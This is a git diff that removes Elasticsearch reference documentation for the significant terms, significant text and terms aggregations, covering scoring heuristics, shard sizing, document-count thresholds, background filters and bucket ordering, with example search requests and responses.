the background frequency as it may count occurrences found in deleted documents - -Like most design decisions, this is the basis of a trade-off in which we have chosen to provide fast performance at the cost of some (typically small) inaccuracies. -However, the `size` and `shard size` settings covered in the next section provide tools to help control the accuracy levels. - -[[significantterms-aggregation-parameters]] -==== Parameters - -===== JLH score -The JLH score can be used as a significance score by adding the parameter - -[source,js] --------------------------------------------------- - - "jlh": { - } --------------------------------------------------- -// NOTCONSOLE - -The scores are derived from the doc frequencies in _foreground_ and _background_ sets. The _absolute_ change in popularity (foregroundPercent - backgroundPercent) would favor common terms whereas the _relative_ change in popularity (foregroundPercent/ backgroundPercent) would favor rare terms. Rare vs common is essentially a precision vs recall balance and so the absolute and relative changes are multiplied to provide a sweet spot between precision and recall. - -===== Mutual information -Mutual information as described in "Information Retrieval", Manning et al., Chapter 13.5.1 can be used as significance score by adding the parameter - -[source,js] --------------------------------------------------- - - "mutual_information": { - "include_negatives": true - } --------------------------------------------------- -// NOTCONSOLE - -Mutual information does not differentiate between terms that are descriptive for the subset or for documents outside the subset. 
The significant terms therefore can contain terms that appear more or less frequent in the subset than outside the subset. To filter out the terms that appear less often in the subset than in documents outside the subset, `include_negatives` can be set to `false`. - -Per default, the assumption is that the documents in the bucket are also contained in the background. If instead you defined a custom background filter that represents a different set of documents that you want to compare to, set - -[source,js] --------------------------------------------------- - -"background_is_superset": false --------------------------------------------------- -// NOTCONSOLE - -===== Chi square -Chi square as described in "Information Retrieval", Manning et al., Chapter 13.5.2 can be used as significance score by adding the parameter - -[source,js] --------------------------------------------------- - - "chi_square": { - } --------------------------------------------------- -// NOTCONSOLE -Chi square behaves like mutual information and can be configured with the same parameters `include_negatives` and `background_is_superset`. - - -===== Google normalized distance -Google normalized distance as described in "The Google Similarity Distance", Cilibrasi and Vitanyi, 2007 (https://arxiv.org/pdf/cs/0412098v3.pdf) can be used as significance score by adding the parameter - -[source,js] --------------------------------------------------- - - "gnd": { - } --------------------------------------------------- -// NOTCONSOLE -`gnd` also accepts the `background_is_superset` parameter. - - -===== Percentage -A simple calculation of the number of documents in the foreground sample with a term divided by the number of documents in the background with the term. -By default this produces a score greater than zero and less than one. - -The benefit of this heuristic is that the scoring logic is simple to explain to anyone familiar with a "per capita" statistic. However, for fields with high cardinality there is a tendency for this heuristic to select the rarest terms such as typos that occur only once because they score 1/1 = 100%. - -It would be hard for a seasoned boxer to win a championship if the prize was awarded purely on the basis of percentage of fights won - by these rules a newcomer with only one fight under their belt would be impossible to beat. -Multiple observations are typically required to reinforce a view so it is recommended in these cases to set both `min_doc_count` and `shard_min_doc_count` to a higher value such as 10 in order to filter out the low-frequency terms that otherwise take precedence. - -[source,js] --------------------------------------------------- - - "percentage": { - } --------------------------------------------------- -// NOTCONSOLE - -===== Which one is best? - - -Roughly, `mutual_information` prefers high frequent terms even if they occur also frequently in the background. For example, in an analysis of natural language text this might lead to selection of stop words. `mutual_information` is unlikely to select very rare terms like misspellings. `gnd` prefers terms with a high co-occurrence and avoids selection of stopwords. It might be better suited for synonym detection. However, `gnd` has a tendency to select very rare terms that are, for example, a result of misspelling. `chi_square` and `jlh` are somewhat in-between. 
- -It is hard to say which one of the different heuristics will be the best choice as it depends on what the significant terms are used for (see for example [Yang and Pedersen, "A Comparative Study on Feature Selection in Text Categorization", 1997](http://courses.ischool.berkeley.edu/i256/f06/papers/yang97comparative.pdf) for a study on using significant terms for feature selection for text classification). - -If none of the above measures suits your usecase than another option is to implement a custom significance measure: - -===== Scripted -Customized scores can be implemented via a script: - -[source,js] --------------------------------------------------- - - "script_heuristic": { - "script": { - "lang": "painless", - "source": "params._subset_freq/(params._superset_freq - params._subset_freq + 1)" - } - } --------------------------------------------------- -// NOTCONSOLE -Scripts can be inline (as in above example), indexed or stored on disk. For details on the options, see <>. - -Available parameters in the script are - -[horizontal] -`_subset_freq`:: Number of documents the term appears in the subset. -`_superset_freq`:: Number of documents the term appears in the superset. -`_subset_size`:: Number of documents in the subset. -`_superset_size`:: Number of documents in the superset. - -[[sig-terms-shard-size]] -===== Size & Shard Size - -The `size` parameter can be set to define how many term buckets should be returned out of the overall terms list. By -default, the node coordinating the search process will request each shard to provide its own top term buckets -and once all shards respond, it will reduce the results to the final list that will then be returned to the client. -If the number of unique terms is greater than `size`, the returned list can be slightly off and not accurate -(it could be that the term counts are slightly off and it could even be that a term that should have been in the top -size buckets was not returned). - -To ensure better accuracy a multiple of the final `size` is used as the number of terms to request from each shard -(`2 * (size * 1.5 + 10)`). To take manual control of this setting the `shard_size` parameter -can be used to control the volumes of candidate terms produced by each shard. - -Low-frequency terms can turn out to be the most interesting ones once all results are combined so the -significant_terms aggregation can produce higher-quality results when the `shard_size` parameter is set to -values significantly higher than the `size` setting. This ensures that a bigger volume of promising candidate terms are given -a consolidated review by the reducing node before the final selection. Obviously large candidate term lists -will cause extra network traffic and RAM usage so this is quality/cost trade off that needs to be balanced. If `shard_size` is set to -1 (the default) then `shard_size` will be automatically estimated based on the number of shards and the `size` parameter. - - -NOTE: `shard_size` cannot be smaller than `size` (as it doesn't make much sense). When it is, Elasticsearch will - override it and reset it to be equal to `size`. 
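
For example, a request that raises `shard_size` well above `size` to improve the quality of the final selection
could look like the following sketch. It reuses the `force` and `crime_type` fields from the examples above; the
exact numbers are illustrative:

[source,console]
--------------------------------------------------
GET /_search
{
  "query": {
    "terms": { "force": [ "British Transport Police" ] }
  },
  "aggregations": {
    "significant_crime_types": {
      "significant_terms": {
        "field": "crime_type",
        "size": 10,         <1>
        "shard_size": 100   <2>
      }
    }
  }
}
--------------------------------------------------

<1> Return at most 10 significant terms in the final, reduced result.
<2> Ask each shard for a larger candidate list so that promising low-frequency terms are not pruned too early.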
- -===== Minimum document count - -It is possible to only return terms that match more than a configured number of hits using the `min_doc_count` option: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "tags": { - "significant_terms": { - "field": "tag", - "min_doc_count": 10 - } - } - } -} --------------------------------------------------- - -The above aggregation would only return tags which have been found in 10 hits or more. Default value is `3`. - - - - -Terms that score highly will be collected on a shard level and merged with the terms collected from other shards in a second step. However, the shard does not have the information about the global term frequencies available. The decision if a term is added to a candidate list depends only on the score computed on the shard using local shard frequencies, not the global frequencies of the word. The `min_doc_count` criterion is only applied after merging local terms statistics of all shards. In a way the decision to add the term as a candidate is made without being very _certain_ about if the term will actually reach the required `min_doc_count`. This might cause many (globally) high frequent terms to be missing in the final result if low frequent but high scoring terms populated the candidate lists. To avoid this, the `shard_size` parameter can be increased to allow more candidate terms on the shards. However, this increases memory consumption and network traffic. - -`shard_min_doc_count` parameter - -The parameter `shard_min_doc_count` regulates the _certainty_ a shard has if the term should actually be added to the candidate list or not with respect to the `min_doc_count`. Terms will only be considered if their local shard frequency within the set is higher than the `shard_min_doc_count`. If your dictionary contains many low frequent words and you are not interested in these (for example misspellings), then you can set the `shard_min_doc_count` parameter to filter out candidate terms on a shard level that will with a reasonable certainty not reach the required `min_doc_count` even after merging the local frequencies. `shard_min_doc_count` is set to `1` per default and has no effect unless you explicitly set it. - - - - -WARNING: Setting `min_doc_count` to `1` is generally not advised as it tends to return terms that - are typos or other bizarre curiosities. Finding more than one instance of a term helps - reinforce that, while still rare, the term was not the result of a one-off accident. The - default value of 3 is used to provide a minimum weight-of-evidence. - Setting `shard_min_doc_count` too high will cause significant candidate terms to be filtered out on a shard level. This value should be set much lower than `min_doc_count/#shards`. 
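
Both thresholds can be supplied in the same request; a minimal sketch, with illustrative values:

[source,console]
--------------------------------------------------
GET /_search
{
  "aggs": {
    "tags": {
      "significant_terms": {
        "field": "tag",
        "min_doc_count": 10,       <1>
        "shard_min_doc_count": 5   <2>
      }
    }
  }
}
--------------------------------------------------

<1> Applied after the shard results have been merged.
<2> Applied on each shard while candidate terms are being collected.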
- - - -===== Custom background context - -The default source of statistical information for background term frequencies is the entire index and this -scope can be narrowed through the use of a `background_filter` to focus in on significant terms within a narrower -context: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match": { - "city": "madrid" - } - }, - "aggs": { - "tags": { - "significant_terms": { - "field": "tag", - "background_filter": { - "term": { "text": "spain" } - } - } - } - } -} --------------------------------------------------- - -The above filter would help focus in on terms that were peculiar to the city of Madrid rather than revealing -terms like "Spanish" that are unusual in the full index's worldwide context but commonplace in the subset of documents containing the -word "Spain". - -WARNING: Use of background filters will slow the query as each term's postings must be filtered to determine a frequency - - -===== Filtering Values - -It is possible (although rarely required) to filter the values for which buckets will be created. This can be done using the `include` and -`exclude` parameters which are based on a regular expression string or arrays of exact terms. This functionality mirrors the features -described in the <> documentation. - -==== Collect mode - -To avoid memory issues, the `significant_terms` aggregation always computes child aggregations in `breadth_first` mode. -A description of the different collection modes can be found in the -<> documentation. - -==== Execution hint - -There are different mechanisms by which terms aggregations can be executed: - - - by using field values directly in order to aggregate data per-bucket (`map`) - - by using <> of the field and allocating one bucket per global ordinal (`global_ordinals`) - -Elasticsearch tries to have sensible defaults so this is something that generally doesn't need to be configured. - -`global_ordinals` is the default option for `keyword` field, it uses global ordinals to allocates buckets dynamically -so memory usage is linear to the number of values of the documents that are part of the aggregation scope. - -`map` should only be considered when very few documents match a query. Otherwise the ordinals-based execution mode -is significantly faster. By default, `map` is only used when running an aggregation on scripts, since they don't have -ordinals. - - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "tags": { - "significant_terms": { - "field": "tags", - "execution_hint": "map" <1> - } - } - } -} --------------------------------------------------- - -<1> the possible values are `map`, `global_ordinals` - -Please note that Elasticsearch will ignore this execution hint if it is not applicable. diff --git a/docs/reference/aggregations/bucket/significanttext-aggregation.asciidoc b/docs/reference/aggregations/bucket/significanttext-aggregation.asciidoc deleted file mode 100644 index c98c2ff659f..00000000000 --- a/docs/reference/aggregations/bucket/significanttext-aggregation.asciidoc +++ /dev/null @@ -1,489 +0,0 @@ -[[search-aggregations-bucket-significanttext-aggregation]] -=== Significant text aggregation -++++ -Significant text -++++ - -An aggregation that returns interesting or unusual occurrences of free-text terms in a set. 
-It is like the <> aggregation but differs in that: - -* It is specifically designed for use on type `text` fields -* It does not require field data or doc-values -* It re-analyzes text content on-the-fly meaning it can also filter duplicate sections of -noisy text that otherwise tend to skew statistics. - -WARNING: Re-analyzing _large_ result sets will require a lot of time and memory. It is recommended that the significant_text - aggregation is used as a child of either the <> or - <> aggregation to limit the analysis - to a _small_ selection of top-matching documents e.g. 200. This will typically improve speed, memory use and quality of - results. - -.Example use cases: -* Suggesting "H5N1" when users search for "bird flu" to help expand queries -* Suggesting keywords relating to stock symbol $ATI for use in an automated news classifier - -In these cases the words being selected are not simply the most popular terms in results. The most popular words tend to be -very boring (_and, of, the, we, I, they_ ...). -The significant words are the ones that have undergone a significant change in popularity measured between a _foreground_ and _background_ set. -If the term "H5N1" only exists in 5 documents in a 10 million document index and yet is found in 4 of the 100 documents that make up a user's search results -that is significant and probably very relevant to their search. 5/10,000,000 vs 4/100 is a big swing in frequency. - -==== Basic use - -In the typical use case, the _foreground_ set of interest is a selection of the top-matching search results for a query -and the _background_set used for statistical comparisons is the index or indices from which the results were gathered. - -Example: - -[source,console] --------------------------------------------------- -GET news/_search -{ - "query": { - "match": { "content": "Bird flu" } - }, - "aggregations": { - "my_sample": { - "sampler": { - "shard_size": 100 - }, - "aggregations": { - "keywords": { - "significant_text": { "field": "content" } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:news] - - -Response: - -[source,console-result] --------------------------------------------------- -{ - "took": 9, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations" : { - "my_sample": { - "doc_count": 100, - "keywords" : { - "doc_count": 100, - "buckets" : [ - { - "key": "h5n1", - "doc_count": 4, - "score": 4.71235374214817, - "bg_count": 5 - } - ... - ] - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[skip:historically skipped] - -The results show that "h5n1" is one of several terms strongly associated with bird flu. -It only occurs 5 times in our index as a whole (see the `bg_count`) and yet 4 of these -were lucky enough to appear in our 100 document sample of "bird flu" results. That suggests -a significant word and one which the user can potentially add to their search. - -[[filter-duplicate-text-noisy-data]] -==== Dealing with noisy data using `filter_duplicate_text` -Free-text fields often contain a mix of original content and mechanical copies of text (cut-and-paste biographies, email reply chains, -retweets, boilerplate headers/footers, page navigation menus, sidebar news links, copyright notices, standard disclaimers, addresses). - -In real-world data these duplicate sections of text tend to feature heavily in `significant_text` results if they aren't filtered out. 
-Filtering near-duplicate text is a difficult task at index-time but we can cleanse the data on-the-fly at query time using the -`filter_duplicate_text` setting. - - -First let's look at an unfiltered real-world example using the https://research.signalmedia.co/newsir16/signal-dataset.html[Signal media dataset] of -a million news articles covering a wide variety of news. Here are the raw significant text results for a search for the articles -mentioning "elasticsearch": - - -[source,js] --------------------------------------------------- -{ - ... - "aggregations": { - "sample": { - "doc_count": 35, - "keywords": { - "doc_count": 35, - "buckets": [ - { - "key": "elasticsearch", - "doc_count": 35, - "score": 28570.428571428572, - "bg_count": 35 - }, - ... - { - "key": "currensee", - "doc_count": 8, - "score": 6530.383673469388, - "bg_count": 8 - }, - ... - { - "key": "pozmantier", - "doc_count": 4, - "score": 3265.191836734694, - "bg_count": 4 - }, - ... - -} --------------------------------------------------- -// NOTCONSOLE - -The uncleansed documents have thrown up some odd-looking terms that are, on the face of it, statistically -correlated with appearances of our search term "elasticsearch" e.g. "pozmantier". -We can drill down into examples of these documents to see why pozmantier is connected using this query: - -[source,console] --------------------------------------------------- -GET news/_search -{ - "query": { - "simple_query_string": { - "query": "+elasticsearch +pozmantier" - } - }, - "_source": [ - "title", - "source" - ], - "highlight": { - "fields": { - "content": {} - } - } -} --------------------------------------------------- -// TEST[setup:news] - -The results show a series of very similar news articles about a judging panel for a number of tech projects: - -[source,js] --------------------------------------------------- -{ - ... - "hits": { - "hits": [ - { - ... - "_source": { - "source": "Presentation Master", - "title": "T.E.N. Announces Nominees for the 2015 ISE® North America Awards" - }, - "highlight": { - "content": [ - "City of San Diego Mike Pozmantier, Program Manager, Cyber Security Division, Department of", - " Janus, Janus ElasticSearch Security Visualization Engine " - ] - } - }, - { - ... - "_source": { - "source": "RCL Advisors", - "title": "T.E.N. Announces Nominees for the 2015 ISE(R) North America Awards" - }, - "highlight": { - "content": [ - "Mike Pozmantier, Program Manager, Cyber Security Division, Department of Homeland Security S&T", - "Janus, Janus ElasticSearch Security Visualization Engine" - ] - } - }, - ... --------------------------------------------------- -// NOTCONSOLE -Mike Pozmantier was one of many judges on a panel and elasticsearch was used in one of many projects being judged. - -As is typical, this lengthy press release was cut-and-paste by a variety of news sites and consequently any rare names, numbers or -typos they contain become statistically correlated with our matching query. - -Fortunately similar documents tend to rank similarly so as part of examining the stream of top-matching documents the significant_text -aggregation can apply a filter to remove sequences of any 6 or more tokens that have already been seen. 
Let's try this same query now but -with the `filter_duplicate_text` setting turned on: - -[source,console] --------------------------------------------------- -GET news/_search -{ - "query": { - "match": { - "content": "elasticsearch" - } - }, - "aggs": { - "sample": { - "sampler": { - "shard_size": 100 - }, - "aggs": { - "keywords": { - "significant_text": { - "field": "content", - "filter_duplicate_text": true - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:news] - -The results from analysing our deduplicated text are obviously of higher quality to anyone familiar with the elastic stack: - -[source,js] --------------------------------------------------- -{ - ... - "aggregations": { - "sample": { - "doc_count": 35, - "keywords": { - "doc_count": 35, - "buckets": [ - { - "key": "elasticsearch", - "doc_count": 22, - "score": 11288.001166180758, - "bg_count": 35 - }, - { - "key": "logstash", - "doc_count": 3, - "score": 1836.648979591837, - "bg_count": 4 - }, - { - "key": "kibana", - "doc_count": 3, - "score": 1469.3020408163263, - "bg_count": 5 - } - ] - } - } - } -} --------------------------------------------------- -// NOTCONSOLE - -Mr Pozmantier and other one-off associations with elasticsearch no longer appear in the aggregation -results as a consequence of copy-and-paste operations or other forms of mechanical repetition. - -If your duplicate or near-duplicate content is identifiable via a single-value indexed field (perhaps -a hash of the article's `title` text or an `original_press_release_url` field) then it would be more -efficient to use a parent <> aggregation -to eliminate these documents from the sample set based on that single key. The less duplicate content you can feed into -the significant_text aggregation up front the better in terms of performance. - - -.How are the significance scores calculated? -********************************** -The numbers returned for scores are primarily intended for ranking different suggestions sensibly rather than something easily -understood by end users. The scores are derived from the doc frequencies in _foreground_ and _background_ sets. In brief, a -term is considered significant if there is a noticeable difference in the frequency in which a term appears in the subset and -in the background. The way the terms are ranked can be configured, see "Parameters" section. - -********************************** - -.Use the _"like this but not this"_ pattern -********************************** -You can spot mis-categorized content by first searching a structured field e.g. `category:adultMovie` and use significant_text on the -text "movie_description" field. Take the suggested words (I'll leave them to your imagination) and then search for all movies NOT marked as category:adultMovie but containing these keywords. -You now have a ranked list of badly-categorized movies that you should reclassify or at least remove from the "familyFriendly" category. - -The significance score from each term can also provide a useful `boost` setting to sort matches. -Using the `minimum_should_match` setting of the `terms` query with the keywords will help control the balance of precision/recall in the result set i.e -a high setting would have a small number of relevant results packed full of keywords and a setting of "1" would produce a more exhaustive results set with all documents containing _any_ keyword. 
- -********************************** - - - -==== Limitations - - -===== No support for child aggregations -The significant_text aggregation intentionally does not support the addition of child aggregations because: - -* It would come with a high memory cost -* It isn't a generally useful feature and there is a workaround for those that need it - -The volume of candidate terms is generally very high and these are pruned heavily before the final -results are returned. Supporting child aggregations would generate additional churn and be inefficient. -Clients can always take the heavily-trimmed set of results from a `significant_text` request and -make a subsequent follow-up query using a `terms` aggregation with an `include` clause and child -aggregations to perform further analysis of selected keywords in a more efficient fashion. - -===== No support for nested objects - -The significant_text aggregation currently also cannot be used with text fields in -nested objects, because it works with the document JSON source. This makes this -feature inefficient when matching nested docs from stored JSON given a matching -Lucene docID. - -===== Approximate counts -The counts of how many documents contain a term provided in results are based on summing the samples returned from each shard and -as such may be: - -* low if certain shards did not provide figures for a given term in their top sample -* high when considering the background frequency as it may count occurrences found in deleted documents - -Like most design decisions, this is the basis of a trade-off in which we have chosen to provide fast performance at the cost of some (typically small) inaccuracies. -However, the `size` and `shard size` settings covered in the next section provide tools to help control the accuracy levels. - -[[significanttext-aggregation-parameters]] -==== Parameters - -===== Significance heuristics - -This aggregation supports the same scoring heuristics (JLH, mutual_information, gnd, chi_square etc) as the <> aggregation - -[[sig-text-shard-size]] -===== Size & Shard Size - -The `size` parameter can be set to define how many term buckets should be returned out of the overall terms list. By -default, the node coordinating the search process will request each shard to provide its own top term buckets -and once all shards respond, it will reduce the results to the final list that will then be returned to the client. -If the number of unique terms is greater than `size`, the returned list can be slightly off and not accurate -(it could be that the term counts are slightly off and it could even be that a term that should have been in the top -size buckets was not returned). - -To ensure better accuracy a multiple of the final `size` is used as the number of terms to request from each shard -(`2 * (size * 1.5 + 10)`). To take manual control of this setting the `shard_size` parameter -can be used to control the volumes of candidate terms produced by each shard. - -Low-frequency terms can turn out to be the most interesting ones once all results are combined so the -significant_terms aggregation can produce higher-quality results when the `shard_size` parameter is set to -values significantly higher than the `size` setting. This ensures that a bigger volume of promising candidate terms are given -a consolidated review by the reducing node before the final selection. Obviously large candidate term lists -will cause extra network traffic and RAM usage so this is quality/cost trade off that needs to be balanced. 
If `shard_size` is set to -1 (the default) then `shard_size` will be automatically estimated based on the number of shards and the `size` parameter. - - -NOTE: `shard_size` cannot be smaller than `size` (as it doesn't make much sense). When it is, elasticsearch will - override it and reset it to be equal to `size`. - -===== Minimum document count - -It is possible to only return terms that match more than a configured number of hits using the `min_doc_count` option. -The Default value is 3. - -Terms that score highly will be collected on a shard level and merged with the terms collected from other shards in a second step. -However, the shard does not have the information about the global term frequencies available. The decision if a term is added to a -candidate list depends only on the score computed on the shard using local shard frequencies, not the global frequencies of the word. -The `min_doc_count` criterion is only applied after merging local terms statistics of all shards. In a way the decision to add the -term as a candidate is made without being very _certain_ about if the term will actually reach the required `min_doc_count`. -This might cause many (globally) high frequent terms to be missing in the final result if low frequent but high scoring terms populated -the candidate lists. To avoid this, the `shard_size` parameter can be increased to allow more candidate terms on the shards. -However, this increases memory consumption and network traffic. - -`shard_min_doc_count` parameter - -The parameter `shard_min_doc_count` regulates the _certainty_ a shard has if the term should actually be added to the candidate list or -not with respect to the `min_doc_count`. Terms will only be considered if their local shard frequency within the set is higher than the -`shard_min_doc_count`. If your dictionary contains many low frequent words and you are not interested in these (for example misspellings), -then you can set the `shard_min_doc_count` parameter to filter out candidate terms on a shard level that will with a reasonable certainty -not reach the required `min_doc_count` even after merging the local frequencies. `shard_min_doc_count` is set to `1` per default and has -no effect unless you explicitly set it. - - - - -WARNING: Setting `min_doc_count` to `1` is generally not advised as it tends to return terms that - are typos or other bizarre curiosities. Finding more than one instance of a term helps - reinforce that, while still rare, the term was not the result of a one-off accident. The - default value of 3 is used to provide a minimum weight-of-evidence. - Setting `shard_min_doc_count` too high will cause significant candidate terms to be filtered out on a shard level. - This value should be set much lower than `min_doc_count/#shards`. 
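
As with `significant_terms`, both thresholds can be supplied directly in the request. A sketch that combines them
with the recommended `sampler` wrapper, using illustrative threshold values:

[source,console]
--------------------------------------------------
GET news/_search
{
  "query": {
    "match": { "content": "Bird flu" }
  },
  "aggs": {
    "my_sample": {
      "sampler": {
        "shard_size": 100
      },
      "aggs": {
        "keywords": {
          "significant_text": {
            "field": "content",
            "min_doc_count": 4,        <1>
            "shard_min_doc_count": 2   <2>
          }
        }
      }
    }
  }
}
--------------------------------------------------

<1> Applied after the shard results have been merged.
<2> Applied on each shard while candidate terms are being collected.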
- - - -===== Custom background context - -The default source of statistical information for background term frequencies is the entire index and this -scope can be narrowed through the use of a `background_filter` to focus in on significant terms within a narrower -context: - -[source,console] --------------------------------------------------- -GET news/_search -{ - "query": { - "match": { - "content": "madrid" - } - }, - "aggs": { - "tags": { - "significant_text": { - "field": "content", - "background_filter": { - "term": { "content": "spain" } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:news] - -The above filter would help focus in on terms that were peculiar to the city of Madrid rather than revealing -terms like "Spanish" that are unusual in the full index's worldwide context but commonplace in the subset of documents containing the -word "Spain". - -WARNING: Use of background filters will slow the query as each term's postings must be filtered to determine a frequency - - -===== Dealing with source and index mappings - -Ordinarily the indexed field name and the original JSON field being retrieved share the same name. -However with more complex field mappings using features like `copy_to` the source -JSON field(s) and the indexed field being aggregated can differ. -In these cases it is possible to list the JSON _source fields from which text -will be analyzed using the `source_fields` parameter: - -[source,console] --------------------------------------------------- -GET news/_search -{ - "query": { - "match": { - "custom_all": "elasticsearch" - } - }, - "aggs": { - "tags": { - "significant_text": { - "field": "custom_all", - "source_fields": [ "content", "title" ] - } - } - } -} --------------------------------------------------- -// TEST[setup:news] - - -===== Filtering Values - -It is possible (although rarely required) to filter the values for which buckets will be created. This can be done using the `include` and -`exclude` parameters which are based on a regular expression string or arrays of exact terms. This functionality mirrors the features -described in the <> documentation. - - diff --git a/docs/reference/aggregations/bucket/terms-aggregation.asciidoc b/docs/reference/aggregations/bucket/terms-aggregation.asciidoc deleted file mode 100644 index 210ed3c2d5c..00000000000 --- a/docs/reference/aggregations/bucket/terms-aggregation.asciidoc +++ /dev/null @@ -1,772 +0,0 @@ -[[search-aggregations-bucket-terms-aggregation]] -=== Terms aggregation -++++ -Terms -++++ - -A multi-bucket value source based aggregation where buckets are dynamically built - one per unique value. 
- -////////////////////////// - -[source,js] --------------------------------------------------- -PUT /products -{ - "mappings": { - "properties": { - "genre": { - "type": "keyword" - }, - "product": { - "type": "keyword" - } - } - } -} - -POST /products/_bulk?refresh -{"index":{"_id":0}} -{"genre": "rock", "product": "Product A"} -{"index":{"_id":1}} -{"genre": "rock"} -{"index":{"_id":2}} -{"genre": "rock"} -{"index":{"_id":3}} -{"genre": "jazz", "product": "Product Z"} -{"index":{"_id":4}} -{"genre": "jazz"} -{"index":{"_id":5}} -{"genre": "electronic"} -{"index":{"_id":6}} -{"genre": "electronic"} -{"index":{"_id":7}} -{"genre": "electronic"} -{"index":{"_id":8}} -{"genre": "electronic"} -{"index":{"_id":9}} -{"genre": "electronic"} -{"index":{"_id":10}} -{"genre": "electronic"} - -------------------------------------------------- -// NOTCONSOLE -// TESTSETUP - -////////////////////////// - -Example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "genres": { - "terms": { "field": "genre" } <1> - } - } -} --------------------------------------------------- -// TEST[s/_search/_search\?filter_path=aggregations/] - -<1> `terms` aggregation should be a field of type `keyword` or any other data type suitable for bucket aggregations. In order to use it with `text` you will need to enable -<>. - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "genres": { - "doc_count_error_upper_bound": 0, <1> - "sum_other_doc_count": 0, <2> - "buckets": [ <3> - { - "key": "electronic", - "doc_count": 6 - }, - { - "key": "rock", - "doc_count": 3 - }, - { - "key": "jazz", - "doc_count": 2 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] - -<1> an upper bound of the error on the document counts for each term, see <> -<2> when there are lots of unique terms, Elasticsearch only returns the top terms; this number is the sum of the document counts for all buckets that are not part of the response -<3> the list of the top buckets, the meaning of `top` being defined by the <> - -By default, the `terms` aggregation will return the buckets for the top ten terms ordered by the `doc_count`. One can -change this default behaviour by setting the `size` parameter. - -[[search-aggregations-bucket-terms-aggregation-size]] -==== Size - -The `size` parameter can be set to define how many term buckets should be returned out of the overall terms list. By -default, the node coordinating the search process will request each shard to provide its own top `size` term buckets -and once all shards respond, it will reduce the results to the final list that will then be returned to the client. -This means that if the number of unique terms is greater than `size`, the returned list is slightly off and not accurate -(it could be that the term counts are slightly off and it could even be that a term that should have been in the top -size buckets was not returned). - -NOTE: If you want to retrieve **all** terms or all combinations of terms in a nested `terms` aggregation - you should use the <> aggregation which - allows to paginate over all possible terms rather than setting a size greater than the cardinality of the field in the - `terms` aggregation. The `terms` aggregation is meant to return the `top` terms and does not allow pagination. 
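
For illustration, a minimal sketch of overriding the default `size` (the value `3` is arbitrary), using the `genre` field from the example above:

[source,console]
--------------------------------------------------
GET /_search
{
  "aggs": {
    "genres": {
      "terms": {
        "field": "genre",
        "size": 3      <1>
      }
    }
  }
}
--------------------------------------------------

<1> Return at most the top 3 `genre` buckets instead of the default 10.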
- -[[search-aggregations-bucket-terms-aggregation-approximate-counts]] -==== Document counts are approximate - -Document counts (and the results of any sub aggregations) in the terms -aggregation are not always accurate. Each shard provides its own view of what -the ordered list of terms should be. These views are combined to give a final -view. - -==== Shard Size - -The higher the requested `size` is, the more accurate the results will be, but also, the more expensive it will be to -compute the final results (both due to bigger priority queues that are managed on a shard level and due to bigger data -transfers between the nodes and the client). - -The `shard_size` parameter can be used to minimize the extra work that comes with bigger requested `size`. When defined, -it will determine how many terms the coordinating node will request from each shard. Once all the shards responded, the -coordinating node will then reduce them to a final result which will be based on the `size` parameter - this way, -one can increase the accuracy of the returned terms and avoid the overhead of streaming a big list of buckets back to -the client. - - -NOTE: `shard_size` cannot be smaller than `size` (as it doesn't make much sense). When it is, Elasticsearch will - override it and reset it to be equal to `size`. - - -The default `shard_size` is `(size * 1.5 + 10)`. - -==== Calculating Document Count Error - -There are two error values which can be shown on the terms aggregation. The first gives a value for the aggregation as -a whole which represents the maximum potential document count for a term which did not make it into the final list of -terms. This is calculated as the sum of the document count from the last term returned from each shard. - -==== Per bucket document count error - -The second error value can be enabled by setting the `show_term_doc_count_error` parameter to true: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "products": { - "terms": { - "field": "product", - "size": 5, - "show_term_doc_count_error": true - } - } - } -} --------------------------------------------------- -// TEST[s/_search/_search\?filter_path=aggregations/] - - -This shows an error value for each term returned by the aggregation which represents the 'worst case' error in the document count -and can be useful when deciding on a value for the `shard_size` parameter. This is calculated by summing the document counts for -the last term returned by all shards which did not return the term. - -These errors can only be calculated in this way when the terms are ordered by descending document count. When the aggregation is -ordered by the terms values themselves (either ascending or descending) there is no error in the document count since if a shard -does not return a particular term which appears in the results from another shard, it must not have that term in its index. When the -aggregation is either sorted by a sub aggregation or in order of ascending document count, the error in the document counts cannot be -determined and is given a value of -1 to indicate this. - -[[search-aggregations-bucket-terms-aggregation-order]] -==== Order - -The order of the buckets can be customized by setting the `order` parameter. By default, the buckets are ordered by -their `doc_count` descending. It is possible to change this behaviour as documented below: - -WARNING: Sorting by ascending `_count` or by sub aggregation is discouraged as it increases the -<> on document counts. 
-It is fine when a single shard is queried, or when the field that is being aggregated was used -as a routing key at index time: in these cases results will be accurate since shards have disjoint -values. However otherwise, errors are unbounded. One particular case that could still be useful -is sorting by <> or -<> aggregation: counts will not be accurate -but at least the top buckets will be correctly picked. - -Ordering the buckets by their doc `_count` in an ascending manner: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "genres": { - "terms": { - "field": "genre", - "order": { "_count": "asc" } - } - } - } -} --------------------------------------------------- - -Ordering the buckets alphabetically by their terms in an ascending manner: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "genres": { - "terms": { - "field": "genre", - "order": { "_key": "asc" } - } - } - } -} --------------------------------------------------- - -deprecated[6.0.0, Use `_key` instead of `_term` to order buckets by their term] - -Ordering the buckets by single value metrics sub-aggregation (identified by the aggregation name): - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "genres": { - "terms": { - "field": "genre", - "order": { "max_play_count": "desc" } - }, - "aggs": { - "max_play_count": { "max": { "field": "play_count" } } - } - } - } -} --------------------------------------------------- - -Ordering the buckets by multi value metrics sub-aggregation (identified by the aggregation name): - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "genres": { - "terms": { - "field": "genre", - "order": { "playback_stats.max": "desc" } - }, - "aggs": { - "playback_stats": { "stats": { "field": "play_count" } } - } - } - } -} --------------------------------------------------- - -[NOTE] -.Pipeline aggs cannot be used for sorting -======================================= - -<> are run during the -reduce phase after all other aggregations have 